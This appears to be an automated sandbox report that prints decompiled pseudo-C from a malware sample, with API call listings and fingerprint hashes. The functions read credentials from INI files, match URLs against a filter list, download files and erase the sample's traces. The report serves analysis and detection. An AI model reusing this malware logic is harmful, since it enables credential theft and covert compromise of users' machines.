    							_t64 = StrStrIW(_v8,  &_v48);
    							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
    								_t84 =  &(_t83[0xff]);
    								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
    									_t26 =  &(_t84[0xff]); // 0x0
    									_t94 = _t26;
    									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E004139F3(_t81, _t94) > 0) {
    										_t95 =  &_v144;
    										_t72 = 0x56;
    										E004159A4(_t72,  &_v144);
    										_push(_v12);
    										_t30 =  &(_t84[0xff]); // 0x0
    										_push(_t84);
    										_t85 = _v16;
    										_t81 = 0x307;
    										_t76 = E00417114(_t95, 0x307, _v16, _t95);
    										_t97 = _t97 + 0x10;
    										if(_t76 > 0) {
    											_t96 = _a8;
    											if(E00416815(_t76, _t96, _t85) != 0) {
    												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L15;
    					} else {
    						E00416421(_v12);
    						_t86 = _v20;
    						goto L17;
    					}
    				}
    			}

    APIs
    • GetPrivateProfileStringW.KERNEL32 ref: 00413B95
      • Part of subcall function 004163F1: HeapAlloc.KERNEL32(00000008,-00000004,00417BBF,00000000,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00416402
    • StrStrIW.SHLWAPI(00000001,?), ref: 00413C1D
    • StrStrIW.SHLWAPI(00000001,?), ref: 00413C2E
    • GetPrivateProfileStringW.KERNEL32 ref: 00413C4A
    • GetPrivateProfileStringW.KERNEL32 ref: 00413C68
    • GetPrivateProfileStringW.KERNEL32 ref: 00413C82
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfileString$AllocHeap
    • String ID:
    • API String ID: 2479592106-0
    • Opcode ID: 12972e4f2a557715c626d179d363f3ee32402e6d8786d9dd5ad551cc323cbef3
    • Instruction ID: d0b461bd5f32aa60f1d19cd00a05bf9b9cc0b8ba44053562f107316629f7a24a
    • Opcode Fuzzy Hash: 12972e4f2a557715c626d179d363f3ee32402e6d8786d9dd5ad551cc323cbef3
    • Instruction Fuzzy Hash: 9641943290011AFADF109BA5CD01EEFFB79EF44718F114026B904F7251DB38AE8597A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E004100E7(intOrPtr _a4) {
    				char _v9;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v32;
    				char _v36;
    				char _v60;
    				char _v72;
    				signed int _v76;
    				char* _v80;
    				void* _v96;
    				intOrPtr _v148;
    				void* _v160;
    				char _v168;
    				char _v272;
    				char _v536;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t128;
    				intOrPtr* _t129;
    				char* _t130;
    				void* _t137;
    				void* _t140;
    				void* _t144;
    				void* _t152;
    				void* _t154;
    				char* _t156;
    				void* _t161;
    				void* _t163;
    				void* _t164;
    				void* _t167;
    				void* _t172;
    				intOrPtr _t174;
    				intOrPtr* _t176;
    				void* _t177;
    				void* _t182;
    				intOrPtr _t186;
    				intOrPtr _t187;
    				signed int _t189;
    				void* _t194;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    				int _t204;
    				void* _t207;
    				signed int _t210;
    				void* _t214;
    				signed int _t217;
    				signed int _t218;
    				void* _t219;
    				void* _t224;
    				char* _t227;
    				intOrPtr _t228;
    				char* _t233;
    				char* _t236;
    				intOrPtr _t238;
    				signed int _t239;
    				intOrPtr _t240;
    				void* _t244;
    				void* _t247;
    				void* _t285;
    
    				_t217 = 0;
    				_v16 = 0;
    				_v9 = 0xff;
    				EnterCriticalSection(0x4230bc);
    				_t225 =  *0x4230d8;
    				if( *0x4230d8 == 0 ||  *0x4230d4 == 0) {
    					_t240 = _a4;
    				} else {
    					_t240 = _a4;
    					_t230 = 0;
    					if(E0040F81C(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
    						_t210 = E0040D72B();
    						_v20 = _t210;
    						if(_t210 != 0) {
    							_t214 = E0040F8D6(0, 4,  &_v20,  *0x4230d4);
    							_push(_v20);
    							if(_t214 == 0) {
    								E00416421();
    							}
    							E0040D796(_t225);
    						}
    						E00416421( *0x4230d4);
    						E00416421( *0x4230d8);
    						 *0x4230d4 = _t217;
    						 *0x4230d8 = _t217;
    					}
    				}
    				LeaveCriticalSection(0x4230bc);
    				_t128 =  *((intOrPtr*)(_t240 + 0x40));
    				_t254 = _t128 - _t217;
    				if(_t128 == _t217) {
    					L38:
    					if((_v16 & 0x00000001) == 0) {
    						_t187 =  *((intOrPtr*)(_t240 + 0x44));
    						_t272 = _t187 - _t217;
    						if(_t187 != _t217 && E0040FAD7(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
    							_v16 = _v16 | 0x00000001;
    						}
    					}
    					if( *(_t240 + 0x20) >= 0x21) {
    						_t182 = 0x10;
    						E0041596E(_t182,  &_v72);
    						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
    						if(E00416492( &_v72, _t238, 0x21) == 0) {
    							_t186 =  *((intOrPtr*)(_t238 + 0x21));
    							if(_t186 == 0x3b || _t186 == 0) {
    								_v16 = _v16 | 0x00000010;
    							}
    						}
    					}
    					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
    					_v24 = _t217;
    					if(_t129 == _t217 ||  *_t129 == _t217) {
    						L52:
    						_t130 =  *((intOrPtr*)(_t240 + 0x34));
    						__eflags = _t130 - _t217;
    						if(_t130 == _t217) {
    							goto L60;
    						}
    						__eflags =  *_t130;
    						if( *_t130 == 0) {
    							goto L60;
    						}
    						_t167 = 0x12;
    						E004159A4(_t167,  &_v168);
    						_t172 = E0041718F( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
    						_t247 = _t247 + 0xc;
    						goto L55;
    					} else {
    						_t176 =  *((intOrPtr*)(_t240 + 0x30));
    						if(_t176 == _t217 ||  *_t176 == _t217) {
    							goto L52;
    						} else {
    							_t177 = 0x11;
    							E004159A4(_t177,  &_v272);
    							_push( *((intOrPtr*)(_a4 + 0x30)));
    							_t172 = E0041718F( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
    							_t247 = _t247 + 0x10;
    							L55:
    							if(_t172 > _t217) {
    								_t174 = E004177D0(_v24, _t172 + _t172);
    								_t285 =  *0x422fec - _t174; // 0x0
    								if(_t285 != 0) {
    									_t64 =  &_v16;
    									 *_t64 = _v16 | 0x00000020;
    									__eflags =  *_t64;
    									 *0x422fec = _t174;
    								} else {
    									E00416421(_v24);
    									_v24 = _t217;
    								}
    							}
    							_t240 = _a4;
    							L60:
    							if(_v9 != 0xff) {
    								__eflags = _v9 - 1;
    								if(_v9 != 1) {
    									L67:
    									if((_v16 & 0x00000008) == 0) {
    										L93:
    										E00416421(_v24);
    										_t218 = _v16;
    										if((_t218 & 0x00000001) == 0) {
    											if(E0040FB3F(_t230, _t240) != 0) {
    												_t218 = _t218 | 0x00000002;
    											}
    											if((_t218 & 0x00000010) != 0 && E0040FEF9(_t240, _t230) != 0) {
    												_t218 = _t218 | 0x00000004;
    											}
    										}
    										return _t218;
    									}
    									_t136 =  *(_t240 + 0x28);
    									_t219 = 0;
    									if( *(_t240 + 0x28) != 0) {
    										__eflags = _v16 & 0x00000010;
    										if((_v16 & 0x00000010) == 0) {
    											__eflags =  *(_t240 + 0x20);
    											if( *(_t240 + 0x20) != 0) {
    												L92:
    												_v16 = _v16 & 0xfffffff7;
    												goto L93;
    											}
    											_t233 =  &_v36;
    											_t137 = 0xc;
    											E0041596E(_t137, _t233);
    											_push(_t233);
    											_push(9);
    											L81:
    											_pop(_t140);
    											_v20 = E0041687F(_t140);
    											L82:
    											if(_v20 == 0) {
    												goto L92;
    											}
    											E0041612D( &_v32);
    											_t144 = E00416661( *(_t240 + 0xc), 0,  *(_t240 + 8));
    											_t235 = _t144;
    											if(_t144 != 0) {
    												_t230 = 0x3c;
    												E004164D4( &_v160,  &_v160, 0, _t230);
    												_v160 = _t230;
    												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
    													_t152 = 0xa;
    													E004159A4(_t152,  &_v272);
    													_t154 = 0xd;
    													E004159A4(_t154,  &_v60);
    													_t227 =  *(_a4 + 0x10);
    													_t156 = 0x4036b4;
    													_t230 =  ==  ? 0x4036b4 : _v24;
    													_t244 =  ==  ? 0x4036b4 : _v32;
    													if(_t227 == 0) {
    														_t227 = "-";
    													}
    													if((_v16 & 0x00000001) != 0) {
    														_t156 =  &_v60;
    													}
    													_push(_v20);
    													_push(_t230);
    													_push(_t244);
    													_push(_t227);
    													_push(_t156);
    													_t161 = E00405851(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
    													_t240 = _a4;
    													_t219 = _t161;
    												}
    												E00416421(_t235);
    											}
    											E00416421(_v32);
    											E00416421(_v20);
    											if(_t219 != 0) {
    												goto L93;
    											} else {
    												goto L92;
    											}
    										}
    										_t230 = E0041687F(_t136,  *((intOrPtr*)(_t240 + 0x24)));
    										_v20 = _t230;
    										__eflags = _t230;
    										if(_t230 == 0) {
    											goto L92;
    										}
    										_t163 = 0;
    										__eflags =  *(_t240 + 0x28);
    										if( *(_t240 + 0x28) <= 0) {
    											goto L82;
    										} else {
    											goto L73;
    										}
    										do {
    											L73:
    											_t228 =  *((intOrPtr*)(_t163 + _t230));
    											__eflags = _t228 - 0x26;
    											if(_t228 != 0x26) {
    												__eflags = _t228 - 0x2b;
    												if(_t228 == 0x2b) {
    													 *((char*)(_t163 + _t230)) = 0x20;
    												}
    											} else {
    												 *((char*)(_t163 + _t230)) = 0xa;
    											}
    											_t163 = _t163 + 1;
    											__eflags = _t163 -  *(_t240 + 0x28);
    										} while (_t163 <  *(_t240 + 0x28));
    										goto L82;
    									}
    									_t236 =  &_v36;
    									_t164 = 0xb;
    									E0041596E(_t164, _t236);
    									_push(_t236);
    									_push(7);
    									goto L81;
    								}
    								L66:
    								_v16 = _v16 | 0x00000008;
    								goto L67;
    							}
    							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
    								if((_v16 & 0x00000020) == 0) {
    									goto L67;
    								}
    							}
    							goto L66;
    						}
    					}
    				}
    				_t189 = E0041BF9B( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
    				_t225 = _v32;
    				_v20 = _t189;
    				if(E004172B3(_t189, _v32) == 0) {
    					L37:
    					E00416421(_v20);
    					_t217 = 0;
    					goto L38;
    				} else {
    					_t239 = _v20;
    					do {
    						_t225 = _t239 + 1;
    						if( *_t225 == 0) {
    							goto L36;
    						}
    						_t194 =  *_t239;
    						if(_t194 == 0x21) {
    							L22:
    							_t239 = _t225;
    							L23:
    							_t230 = 0;
    							_t225 = _t239;
    							if(E0040F81C(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
    								goto L36;
    							}
    							_t197 = _t224;
    							if(_t197 == 0) {
    								_v9 = 0;
    								L35:
    								if(_t224 != 2) {
    									goto L37;
    								}
    								goto L36;
    							}
    							_t198 = _t197 - 1;
    							if(_t198 == 0) {
    								L30:
    								_v9 = 1;
    								goto L35;
    							}
    							_t199 = _t198 - 1;
    							if(_t199 == 0) {
    								_t230 = 0x3c;
    								E004164D4( &_v96,  &_v96, 0, 0);
    								_v80 =  &_v536;
    								_v96 = 0;
    								_v76 = 0x103;
    								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
    								__eflags = _t204 - 1;
    								if(_t204 == 1) {
    									__eflags = _v76;
    									if(_v76 > 0) {
    										E004160E7( &_v536);
    									}
    								}
    								goto L35;
    							}
    							_t207 = _t199 - 1;
    							if(_t207 == 0 || _t207 == 1) {
    								_v16 = _v16 | 0x00000001;
    								goto L30;
    							} else {
    								goto L35;
    							}
    						}
    						if(_t194 == 0x2d) {
    							goto L22;
    						}
    						if(_t194 == 0x40) {
    							goto L22;
    						}
    						if(_t194 == 0x5e) {
    							_t224 = 4;
    							goto L22;
    						} else {
    							_t224 = 0;
    							goto L23;
    						}
    						L36:
    						_t239 = E004172F1(_t239, 1);
    					} while (_t239 != 0);
    					goto L37;
    				}
    			}

    APIs
    • EnterCriticalSection.KERNEL32(004230BC,-00422FC8,00000000,00422FAC), ref: 00410102
    • LeaveCriticalSection.KERNEL32(004230BC), ref: 00410185
    • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00410250
    • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 0041048A
      • Part of subcall function 0040D72B: CreateMutexW.KERNEL32(00422978,00000000,00423058,?,00000001,?,0040B693), ref: 0040D753
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
    • String ID:
    • API String ID: 4018265435-3916222277
    • Opcode ID: b0e94767b2febf08fef8d3adb43d3215a60532055132960903f0efdece1733c0
    • Instruction ID: 6118c3ba7e39afd5436057fb4ce6b68c8791c97e0caaf4aa950c58bda734d9e1
    • Opcode Fuzzy Hash: b0e94767b2febf08fef8d3adb43d3215a60532055132960903f0efdece1733c0
    • Instruction Fuzzy Hash: 2FD1F031E00209AFDF219BA1C845BEF7BB6AF04304F14846BE955A7291C7BD9DC5CB19
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E0040F10A(void* __ebx, void* __ecx, void* __eflags) {
    				char _v1168;
    				char _v1668;
    				char _v1680;
    				short _v1688;
    				char _v2192;
    				short _v2208;
    				char _v2720;
    				char _v2728;
    				char _v2992;
    				char _v3072;
    				void* __edi;
    				void* __esi;
    				void* _t34;
    				WCHAR* _t50;
    				WCHAR* _t51;
    				WCHAR* _t52;
    				void* _t56;
    				void* _t65;
    
    				_t65 = __eflags;
    				_t46 = __ecx;
    				_push(_t56);
    				_t50 =  &_v1668;
    				E00406AB8(__ecx, _t50, _t56, 1);
    				PathRemoveFileSpecW(_t50);
    				_t51 =  &_v2192;
    				E00406AB8(_t46, _t51, PathRemoveFileSpecW, 2);
    				PathRemoveFileSpecW(_t51);
    				 *0x422940 =  *0x422940 | 0x00000002;
    				_push(0);
    				E0040E698();
    				E00415B35(_t46, _t65);
    				E0041BA9D( &_v1680, _t65);
    				E0041BA9D(_t51, _t65);
    				_t52 =  &_v2720;
    				E00406AB8(_t51, _t52, PathRemoveFileSpecW, 3);
    				SHDeleteKeyW(0x80000001, _t52);
    				CharToOemW( &_v1688,  &_v2728);
    				CharToOemW( &_v2208,  &_v2992);
    				_t53 =  &_v3072;
    				_t34 = 7;
    				E0041596E(_t34,  &_v3072);
    				_push( &_v2992);
    				_push( &_v2728);
    				_push( &_v2992);
    				_push( &_v2728);
    				if(E00417158( &_v3072, 0x474,  &_v1168, _t53) > 0) {
    					E00417EE1(__ebx, 0x474,  &_v1168);
    				}
    				if( *0x422e08 == 0xffffffff) {
    					ExitProcess(0);
    				}
    				return 1;
    			}

    APIs
      • Part of subcall function 00406AB8: PathRenameExtensionW.SHLWAPI(?,.dat,?,004229A0,00000032,77E49EB0,?,00000000), ref: 00406B33
    • PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 0040F12F
    • PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 0040F142
      • Part of subcall function 0040E698: SetEvent.KERNEL32(0040F152,00000000), ref: 0040E69E
      • Part of subcall function 0040E698: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040E6B1
      • Part of subcall function 00415B35: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000,?,750D46D0), ref: 00415B72
      • Part of subcall function 00415B35: Sleep.KERNEL32(000001F4), ref: 00415B81
      • Part of subcall function 00415B35: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 00415B97
      • Part of subcall function 0041BA9D: FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BACE
      • Part of subcall function 0041BA9D: FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 0041BB29
      • Part of subcall function 0041BA9D: FindClose.KERNEL32(00000000,?,00000000), ref: 0041BB34
      • Part of subcall function 0041BA9D: SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000), ref: 0041BB40
      • Part of subcall function 0041BA9D: RemoveDirectoryW.KERNEL32(?,?,00000000), ref: 0041BB47
    • SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0040F180
    • CharToOemW.USER32 ref: 0040F19C
    • CharToOemW.USER32 ref: 0040F1AB
    • ExitProcess.KERNEL32 ref: 0040F201
      • Part of subcall function 00417EE1: CharToOemW.USER32 ref: 00417F11
      • Part of subcall function 00417EE1: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00417F95
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
    • String ID:
    • API String ID: 1572960351-0
    • Opcode ID: 41388d71211dccdda4ff7d1a0613181a0220bafe2614ad0bd51cce0de9bdc306
    • Instruction ID: 3e635dc6a14fa669bf9bfac9dd0796a2dbf20fd77371aeec616487593a42b744
    • Opcode Fuzzy Hash: 41388d71211dccdda4ff7d1a0613181a0220bafe2614ad0bd51cce0de9bdc306
    • Instruction Fuzzy Hash: 6321AE72608344ABC230A7A5DD0AFDB779CEB80310F40092BB548E7191DB78A544CBD6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00418263(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
    				char _v5;
    				long _v12;
    				struct _OVERLAPPED* _v16;
    				void* _v20;
    				long _v24;
    				void* _t28;
    				long _t37;
    				void* _t41;
    
    				_v5 = 0;
    				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
    				if(_t41 == 0xffffffff) {
    					L15:
    					return _v5;
    				}
    				_t28 = E004163F1(0x1000);
    				_v20 = _t28;
    				if(_t28 == 0) {
    					L13:
    					CloseHandle(_t41);
    					if(_v5 == 0) {
    						E0041B785(_a8);
    					}
    					goto L15;
    				}
    				_v16 = 0;
    				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
    					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
    						break;
    					}
    					if(_v12 == 0) {
    						FlushFileBuffers(_t41);
    						_v5 = 1;
    						break;
    					}
    					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
    						break;
    					}
    					_t37 = _v12;
    					if(_t37 != _v24) {
    						break;
    					}
    					_v16 = _v16 + _t37;
    					if(_v16 <= _a12) {
    						continue;
    					}
    					break;
    				}
    				E00416421(_v20);
    				goto L13;
    			}

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 00418283
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 004182B1
    • InternetReadFile.WININET(00001000,?,00001000,?), ref: 004182CD
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004182E8
    • FlushFileBuffers.KERNEL32(00000000), ref: 00418308
    • CloseHandle.KERNEL32(00000000), ref: 0041831B
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
    • String ID:
    • API String ID: 3509176705-0
    • Opcode ID: a4f1c7792630f007a6c0e96eff61012815f17df562e80fd9353712034334940c
    • Instruction ID: fb4cfb96fa32c20e05f8d64c6214aec846e094cfd2812eec0a871d786c359294
    • Opcode Fuzzy Hash: a4f1c7792630f007a6c0e96eff61012815f17df562e80fd9353712034334940c
    • Instruction Fuzzy Hash: C821CF7090010CBFDF119FA0DD84AEE7B7AEB04B00F04406EF920B21A1CB3A8D819B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0041AB5D(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
    				intOrPtr* _v8;
    				long _v12;
    				struct HWND__* _v16;
    				int _v20;
    				struct HWND__* _v24;
    				long _t24;
    				struct HWND__* _t33;
    				intOrPtr* _t44;
    
    				_push(_a8);
    				_t44 = __edx;
    				_v8 = __edx;
    				_v20 = __ecx;
    				_t33 = WindowFromPoint(_a4.x);
    				if(_t33 != 0) {
    					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
    						_t24 = _v12;
    						if(_t24 != 0xffffffff) {
    							if(_t44 != 0) {
    								 *_t44 = _t24;
    							}
    						} else {
    							_v16 = _t33;
    							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
    							_t33 = E0041AB5D(_v20, _v8, _a4, _a8);
    							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
    						}
    					} else {
    						_t33 = 0;
    					}
    				}
    				return _t33;
    			}

    APIs
    • WindowFromPoint.USER32(?,?,00000000,?,?,?,00000000), ref: 0041AB79
    • SendMessageTimeoutW.USER32 ref: 0041ABAA
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041ABCE
    • SetWindowLongW.USER32 ref: 0041ABDF
    • GetWindowLongW.USER32(?,000000F0), ref: 0041ABFC
    • SetWindowLongW.USER32 ref: 0041AC0A
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$Long$FromMessagePointSendTimeout
    • String ID:
    • API String ID: 2645164282-0
    • Opcode ID: 859dc8df6dcc1ebd4573e9bee851ba46136a381d0727c62f45e34d34f983877f
    • Instruction ID: aab25c7855bb177517dc3cc880fc13d575527d44d9b35705a65d967a22779575
    • Opcode Fuzzy Hash: 859dc8df6dcc1ebd4573e9bee851ba46136a381d0727c62f45e34d34f983877f
    • Instruction Fuzzy Hash: 8321D871508315ABDB109F65CC44EAB7B98EB84730F20472AFDA0923E2D674D994CBE6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415FF2(intOrPtr _a4) {
    				intOrPtr _v8;
    				void* __esi;
    				void* _t13;
    				signed short _t26;
    				void* _t37;
    
    				_t37 = E00416F70(_a4);
    				if(_t37 > 0x3e8) {
    					EnterCriticalSection(0x423148);
    					E00416421( *0x42313c);
    					 *0x42313c =  *0x42313c & 0x00000000;
    					 *0x423144 = 0;
    					LeaveCriticalSection(0x423148);
    					return 0;
    				}
    				EnterCriticalSection(0x423148);
    				_t26 = ( *0x423144 & 0x0000ffff) + _t37;
    				if(_t26 <= 0x3e8) {
    					_t13 = E004163AC(_t26 + _t26, 0x42313c);
    					if(_t13 != 0) {
    						_t13 = E0041645D( *0x42313c + ( *0x423144 & 0x0000ffff) * 2, _a4, _t37 + _t37);
    						 *0x423144 = _t26;
    					}
    				} else {
    					_t13 = E004163AC(0x7d0, 0x42313c);
    					if(_t13 != 0) {
    						E0041645D( *0x42313c,  *0x42313c + (( *0x423144 & 0x0000ffff) - 0x3e8 - _t37) * 2, 0x3e8 - _t37 + 0x3e8 - _t37);
    						_t13 = E0041645D(0x3e8 - _t37 + 0x3e8 - _t37 +  *0x42313c, _v8, _t37 + _t37);
    						 *0x423144 = 0x3e8;
    					}
    				}
    				LeaveCriticalSection(0x423148);
    				return _t13;
    			}

    APIs
    • EnterCriticalSection.KERNEL32(00423148,?,?,?,004162E5,?), ref: 0041600F
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    • LeaveCriticalSection.KERNEL32(00423148,?,?,?,004162E5,?), ref: 00416030
    • EnterCriticalSection.KERNEL32(00423148,?,?,?,?,004162E5,?), ref: 00416041
    • LeaveCriticalSection.KERNEL32(00423148,?,?,?,004162E5,?), ref: 004160DA
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$FreeHeap
    • String ID: <1B$H1B
    • API String ID: 1946732658-283905126
    • Opcode ID: cfefa21e7802a5a13fad703274c0d355cbc20110554d19dd85c0375b5c0e81d2
    • Instruction ID: b6ca93bbdd33283d58afcc688506cf089c1f223f1f0dfa2792bfe77ec2bf0932
    • Opcode Fuzzy Hash: cfefa21e7802a5a13fad703274c0d355cbc20110554d19dd85c0375b5c0e81d2
    • Instruction Fuzzy Hash: 2621F231300214ABC720DF94ED859BA77B8AF8974AB41002BFA4087171DF3ECAA2C75D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E0041B63F(signed int __eax, void* __ecx, void** __esi, long _a4) {
    				intOrPtr _v8;
    				long _v12;
    				void* _t19;
    				void* _t20;
    				long _t22;
    				void* _t23;
    
    				_t33 = __esi;
    				asm("sbb eax, eax");
    				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
    				__esi[2] = _t19;
    				if(_t19 == 0xffffffff) {
    					L11:
    					_t20 = 0;
    				} else {
    					__imp__GetFileSizeEx(_t19,  &_v12);
    					if(_t19 == 0 || _v8 != 0) {
    						L10:
    						CloseHandle(_t33[2]);
    						goto L11;
    					} else {
    						_t22 = _v12;
    						__esi[1] = _t22;
    						if(_t22 != 0) {
    							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
    							 *__esi = _t23;
    							if(_t23 == 0) {
    								goto L10;
    							} else {
    								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
    									VirtualFree( *_t33, 0, 0x8000);
    									goto L10;
    								} else {
    									goto L5;
    								}
    							}
    						} else {
    							 *__esi = 0;
    							L5:
    							_t20 = 1;
    						}
    					}
    				}
    				return _t20;
    			}

    APIs
    • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B664
    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B677
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B69F
    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B6B7
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B6D1
    • CloseHandle.KERNEL32(?,?,?,?,?,00406FA8,?,?,00000000), ref: 0041B6DA
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
    • String ID:
    • API String ID: 1974014688-0
    • Opcode ID: c2e9f9758a66021854d5a0592999c77f6b9aaf385cead8ab400b9077d8b8dfea
    • Instruction ID: 214f60e33de68eca55045b319765b15f9c67a0f5fc5d9b241046465a5d5136f1
    • Opcode Fuzzy Hash: c2e9f9758a66021854d5a0592999c77f6b9aaf385cead8ab400b9077d8b8dfea
